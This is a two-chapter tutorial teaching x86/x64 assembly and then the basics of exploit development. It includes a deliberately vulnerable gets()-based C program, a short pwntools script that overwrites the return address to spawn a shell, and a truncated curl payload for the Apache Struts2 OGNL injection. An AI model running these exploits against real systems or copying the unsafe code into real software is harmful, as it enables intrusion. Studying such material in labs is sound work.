x86 and x64 Assembly from Scratch

🎯 Objective

To gain a deep, foundational understanding of how x86 and x64 assembly work, from CPU registers and calling conventions to memory addressing and function calls. This is critical for exploit developers who need precise control over memory, registers, and the instruction pointer.


1. Why Learn Assembly for Exploitation?

Exploit developers operate close to the metal β€” at the point where programming languages are compiled into instructions the CPU can directly understand. Memory corruptions, ROP chains, shellcode, and low-level payloads require understanding register state, stack layout, and control flow.

In exploit development:

  • You overwrite EIP or RIP
  • You pivot the stack (ESP or RSP)
  • You inject shellcode and need to place arguments in registers or memory
  • You must understand how values are passed and returned at the assembly level

2. Architecture Overview: x86 vs x64

2.1 x86 (32-bit)

  • 4-byte registers (e.g., eax, ebx)
  • 4GB virtual address space
  • Arguments passed via stack
  • Used in legacy applications or 32-bit systems

2.2 x64 (64-bit)

  • 8-byte registers (rax, rbx)
  • 64-bit pointers, more addressable memory (up to 18 exabytes)
  • First 4 arguments passed in registers (Windows: rcx, rdx, r8, r9)
  • Return values in rax

2.3 Register Subdivisions

Example (x64):

Register:         rax (64-bit)
 β”œβ”€β”€ eax (32-bit)
 β”‚   β”œβ”€β”€ ax (16-bit)
 β”‚       β”œβ”€β”€ ah (8-bit high)
 β”‚       └── al (8-bit low)


3. Register Classifications

ClassRegisters (x86/x64)Description
General-purposeeax, ebx, ecx, edx / raxArithmetic, logic, data movement
Stack-relatedesp, ebp / rsp, rbpStack pointer/base pointer
Instructioneip / ripHolds address of next instruction
Flagseflags / rflagsStatus indicators (ZF, CF, SF)
Segmentcs, ds, es, ss, fs, gsRare in userland, used in kernel
SIMD/FPUxmm0–xmm15, st0–st7, mm0–mm7Vector ops, floating point, MMX

4. Instruction Types and Syntax (Intel Style)

4.1 Syntax Format

instruction destination, source

4.2 Common Instructions

CategoryExampleMeaning
Data Movemov eax, ebxCopy ebx to eax
Arithmeticadd eax, 4eax += 4
Logicaland eax, 0xFFClear all but lower byte
Shiftshr eax, 1Shift right (divide by 2)
Stackpush ebp, pop eaxPush/pull stack values
Controlcall, ret, jmp, je, jneControl flow

5. Addressing Modes and Operand Types

5.1 Addressing Types

ModeSyntaxExample
ImmediateValue constantmov eax, 1
RegisterCPU registermov eax, ebx
Direct MemoryAbsolute addrmov eax, [0x12345678]
Indirect MemoryRegister ptrmov eax, [ebx]
IndexedBase + indexmov eax, [ebp+4]

5.2 Operand Sizes

  • BYTE PTR [mem]: 8-bit
  • WORD PTR [mem]: 16-bit
  • DWORD PTR [mem]: 32-bit
  • QWORD PTR [mem]: 64-bit

6. Memory Layout and Stack Anatomy

Typical process memory layout:

0xFFFFFFFF  ← Stack Top (grows down)
     |
     | Stack (local vars, return addr)
     |
     | Heap (malloc/calloc/free - grows up)
     |
     | BSS (uninitialized globals)
     |
     | Data (initialized globals)
     |
     | Text (code, .text segment - executable)
0x00000000  ← Null page


7. Calling Conventions

7.1 cdecl (x86 Linux default)

  • Arguments pushed right-to-left
  • Return value in eax
  • Caller cleans stack

7.2 stdcall (Windows APIs)

  • Callee cleans stack

7.3 fastcall (Microsoft optimized)

  • Some args in registers (e.g., ecx, edx)

7.4 System V AMD64 ABI (Linux x64)

ArgumentRegister
arg1rdi
arg2rsi
arg3rdx
arg4rcx
arg5r8
arg6r9
  • Return: rax

7.5 Windows x64 Calling Convention

ArgumentRegister
arg1rcx
arg2rdx
arg3r8
arg4r9

8. Function Prologue and Epilogue

x86 Example

push ebp
mov ebp, esp
sub esp, XX         ; allocate space
...
mov esp, ebp
pop ebp
ret

Why It Matters

  • Stack frames are key for local variables
  • Exploits often overwrite saved EIP/RIP on stack

9. Flags Register (EFLAGS/RFLAGS)

FlagMeaning
ZF (Zero Flag)Set if result is 0
CF (Carry Flag)Set if carry occurred
SF (Sign Flag)Set if negative
OF (Overflow)Set if signed overflow
PF (Parity)Set if result has even parity

Used with:

  • cmp, test, je, jg, jl, jne, jz, jnz

10. Interrupts and Syscalls

Linux (x86):

mov eax, 1   ; syscall number: exit
mov ebx, 0   ; exit code
int 0x80     ; software interrupt

Linux (x64):

mov rax, 60  ; syscall: exit
mov rdi, 0   ; exit code
syscall


11. Loop and String Instructions

Looping

mov ecx, 10
loop_label:
; code
loop loop_label  ; decrements ecx, jumps if ecx != 0

String Instructions (with REP prefix)

  • movsb, movsw, movsd
  • cmpsb, stosb, scasb, lodsb
  • rep, repe, repne

12. Writing Inline Assembly in C

int a = 5, b = 3, result;
__asm__(
    "movl %1, %%eax;"
    "addl %2, %%eax;"
    "movl %%eax, %0;"
    : "=r"(result)
    : "r"(a), "r"(b)
    : "%eax"
);


13. Compiling and Running Pure Assembly

hello.asm (NASM + Linux)

section .data
    msg db "Hello!", 0xA
    len equ $ - msg

section .text
    global _start

_start:
    mov eax, 4
    mov ebx, 1
    mov ecx, msg
    mov edx, len
    int 0x80

    mov eax, 1
    xor ebx, ebx
    int 0x80

nasm -f elf hello.asm
ld -m elf_i386 hello.o -o hello
./hello


14. Reverse Engineering and Disassembly

Use objdump, Ghidra, or radare2:

objdump -d binary
gdb ./binary

Look for:

  • Function prologue: push ebp; mov ebp, esp
  • Function calls: call 0x08048400
  • Stack usage: mov eax, [ebp+0x8]

15. Tools and Emulators

ToolUseLink
NASMWrite x86 ASM
GDB + PwndbgDebugging
x64dbgWindows reversing
GodboltC to Assembly
GhidraDisassembler
Radare2RE suite
Online x86 EmulatorRun x86 code in browser

βœ… Summary

  • Assembly allows direct control of CPU and memory.
  • Key registers (eax, esp, eip) are critical for understanding control flow and payload placement.
  • Stack frames, calling conventions, and memory addressing are the basis of buffer overflows and ROP chains.
  • Tools like NASM, GDB, x64dbg, and Ghidra will help analyze and write exploits.

What is Exploit Development?

β€œUnderstanding the art of turning bugs into code execution”

🎯 Objective

To build a comprehensive understanding of what exploit development is, its goals, classifications, and how attackers leverage vulnerabilities to hijack program execution. This chapter covers vulnerability classes, real-world scenarios, memory manipulation techniques, and low-level primitives that form the core of exploitation.


1.1 What is an Exploit?

An exploit is a crafted input, payload, or sequence of interactions that takes advantage of a vulnerability in software to achieve unintended behavior, usually with malicious or unauthorized intent.

These behaviors may include:

  • Executing arbitrary code
  • Reading or writing sensitive memory
  • Causing a crash (Denial of Service)
  • Escalating privileges
  • Bypassing application logic

Example

// vulnerable.c
#include <stdio.h>

int main() {
    char buffer[100];
    gets(buffer); // vulnerable to buffer overflow
    printf("You entered: %s\n", buffer);
    return 0;
}

If buffer is overrun, the return address on the stack can be overwritten, causing the program to jump to attacker-controlled code.


1.2 Exploit vs Payload vs Shellcode

TermDescription
ExploitThe method of taking control (e.g., stack buffer overflow, use-after-free)
PayloadThe action performed once control is gained (e.g., spawn shell, reverse shell)
ShellcodeCompact machine code payload, usually to open a shell or call system functions

1.3 Exploitation Workflow

  1. Discovery – Identify the vulnerability
  2. Analysis – Reverse engineer the bug
  3. Trigger – Create the condition to exploit it
  4. Control – Gain instruction pointer (IP) control
  5. Payload Execution – Run arbitrary code or commands
  6. Post-Exploitation – Escalate privileges, persist, exfiltrate data

1.4 Exploitation Goals

GoalExplanation
Code ExecutionExecute arbitrary shellcode, malware, or system calls
Privilege EscalationElevate from user β†’ admin/root/system
Information DisclosureLeak memory (e.g., ASLR bypass, passwords)
Denial of ServiceCrash system/service
PersistenceSurvive reboots, re-infections
EvasionAvoid AV, EDR, and logging tools

1.5 Exploit Types (By Technique)

Memory Corruption-Based

  • Stack Buffer Overflow
    Overwriting return address on the stack.
  • Heap Overflow
    Overwriting heap structures to gain arbitrary write or control flow.
  • Use-After-Free (UAF)
    Using memory after it has been freed; attacker reallocates it with malicious data.
  • Double Free
    Two free() calls on the same pointer can corrupt heap metadata.
  • Format String Bug
    Using uncontrolled format strings like printf(user_input) leads to arbitrary read/write.
  • Integer Overflow/Underflow
    Bypass size checks, leading to incorrect memory allocations.

Logical Vulnerabilities

  • Race Conditions
    Timing issues in multithreaded environments.
  • Improper Access Control
    Missing authentication or authorization checks.
  • Insecure Deserialization
    Arbitrary object creation from untrusted data.

1.6 Real Exploitation Example

Here’s a simple Linux example of stack-based control hijacking.

vulnerable.c

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void secret() {
    printf("PWNED! Code execution achieved!\n");
    system("/bin/sh");
}

void vulnerable() {
    char buffer[64];
    printf("Enter input: ");
    gets(buffer); // unsafe
}

int main() {
    vulnerable();
    return 0;
}

Compile with protections disabled:

gcc vulnerable.c -o vuln -fno-stack-protector -z execstack -no-pie

Exploitation Steps

  1. Overflow buffer and overwrite return address
  2. Redirect execution to secret()
  3. Shell spawned

You can use Pwntools to automate the attack:

from pwn import *

elf = ELF('./vuln')
p = process(elf.path)

payload = b'A' * 72  # Offset to return address
payload += p64(elf.symbols['secret'])

p.sendlineafter('Enter input: ', payload)
p.interactive()


1.7 Common Exploit Development Toolset

ToolPurposeLink
GDBDebugging on Linuxhttps://www.gnu.org/software/gdb/
PwndbgGDB plugin for exploit devhttps://github.com/pwndbg/pwndbg
PwntoolsPython framework for writing exploitshttps://github.com/Gallopsled/pwntools
x64dbgWindows GUI debuggerhttps://x64dbg.com/
Immunity DebuggerSEH exploit developmenthttps://www.immunityinc.com/products/debugger/
IDA Pro / GhidraReverse engineeringhttps://ghidra-sre.org/
ROPgadgetROP chain finderhttps://github.com/JonathanSalwan/ROPgadget
Mona.pyROP + exploit helper for Immunityhttps://github.com/corelan/mona
Radare2Binary analysis CLI toolhttps://rada.re/n/
msfvenomShellcode & payload generatorhttps://docs.metasploit.com/

1.8 Architectural Concepts

  • Registers
    • x86: eax, ebx, esp, ebp, eip
    • x64: rax, rbx, rsp, rbp, rip
  • Calling Conventions
    • cdecl (caller cleans up stack)
    • stdcall (callee cleans up stack)
    • fastcall, sysv, Windows x64 (RCX, RDX, R8, R9)
  • Endianness
    • Most systems are little-endian (e.g., 0xdeadbeef stored as ef be ad de)

1.9 Operating System Security Mechanisms

MitigationDescription
DEP / NXNon-executable stack/heap
ASLRRandomized memory layout
Stack CookiesCanary values to detect buffer overflows
SEHStructured Exception Handling (Windows)
SMEP / KASLRKernel memory protection

We will cover bypass techniques for these later in:

  • Return Oriented Programming (ROP)
  • ret2libc
  • Shellcode relocation
  • Heap grooming

1.10 Real-World Exploit Example (CVE)

CVE-2017-5638 – Apache Struts2 RCE

  • Vulnerability: Crafted Content-Type header triggers OGNL injection.
  • Exploit: curl -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)...}" \ http://target.com/struts2-showcase/upload.action

Another: CVE-2017-0144 – EternalBlue

  • MS SMBv1 vulnerability
  • Used in WannaCry ransomware
  • Kernel-level remote exploit on Windows XP to Windows 7

Exploit development is highly sensitive and legally restricted when performed outside ethical boundaries.

Use only in:

  • Lab environments
  • Capture the Flag (CTF) competitions
  • Bug bounty programs
  • With explicit authorization

Unauthorized access or exploitation is illegal and unethical.


βœ… Summary

  • An exploit is not just a payload but the entire logic and sequence required to hijack control flow.
  • Memory corruption (e.g., buffer overflow, UAF) is a primary class of vulnerabilities.
  • The exploitation process involves discovery, analysis, payloading, and post-exploitation steps.
  • A good exploit developer is part developer, part reverse engineer, and part OS internals expert.
  • Modern defenses like DEP, ASLR, stack cookies require advanced techniques to bypass.